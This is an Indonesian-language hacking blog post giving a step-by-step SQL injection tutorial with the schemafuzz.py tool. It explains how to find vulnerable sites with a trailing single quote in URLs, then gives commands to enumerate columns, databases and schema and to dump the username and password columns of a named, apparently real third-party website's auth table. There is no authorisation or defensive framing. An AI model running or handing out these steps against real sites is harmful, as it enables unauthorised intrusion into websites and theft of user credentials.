Sunday, 12.17.2017, 12:56 PM
N30-G4BR13L
Main | Publisher | Registration | Login
Site menu
Section categories
Trick Blog [9]
All About Computer and Network [3]
Hacking [22]
Do you know? [3]
Zona Religi [5]
Belajar Pemrograman [0]
My Diary [1]
My Playlist

My YM Pinbox

Powered by:
Statistics

Total online: 1
Guests: 1
Users: 0
Main » Articles » Hacking

SQL Inject with Schemafuzz
Dlu udh pernah ada trhead nya, tapi gak tau hilang kmn, jd saya buat lg aja.

Oke, untuk yang belum tau aja yhaa... ^^

Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckckc… windos… windos… repot emang). Utk linux, langsung pake aja… ^^

1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ << Singel quote (’) di akhir url. Nah, apabila muncul pesan error “MySQL error syntax blablabla…” berarti web tsb vul terhadap SQL injection. Paham? oke, lanjut…

2. Target kita kali ini adalah http://www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py --findcol -u
[Image: 26601198.png]

Nanti akan muncul seperti ini:

[Image: 28121691.png]

disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..

3. cari database name,..
command :
schemafuzz.py –-dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.

[Image: 62899950.png]

setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,

4. lihat table dan column,
command :
schemafuzz.py –-schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase

hasil nya akan terlihat seperti ini,


[Image: 27172380.png]

digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)

5. lihat data dalam collum!
command :
schemafuzz.py –-dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22...,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass


lihat gambar,

[Image: 58758576.png]

Yang di block adalah username dan password ^^

Selesai… gunakan tools ini dng bijak yaa ^^

source: http://hacker-newbie.org
Category: Hacking | Added by: neo-gabriel (08.16.2009)
Views: 498 | Comments: 18 | Rating: 0.0/0 |
Total comments: 0
Name *:
Email *:
Code *:
Search
Login form
My YM Status

Flag Counter
free counters
Silakan Berteriak!!
Link Back ya,
http://neo-gabriel.tk
My Friends

Copyright Neo-Gabriel © 2017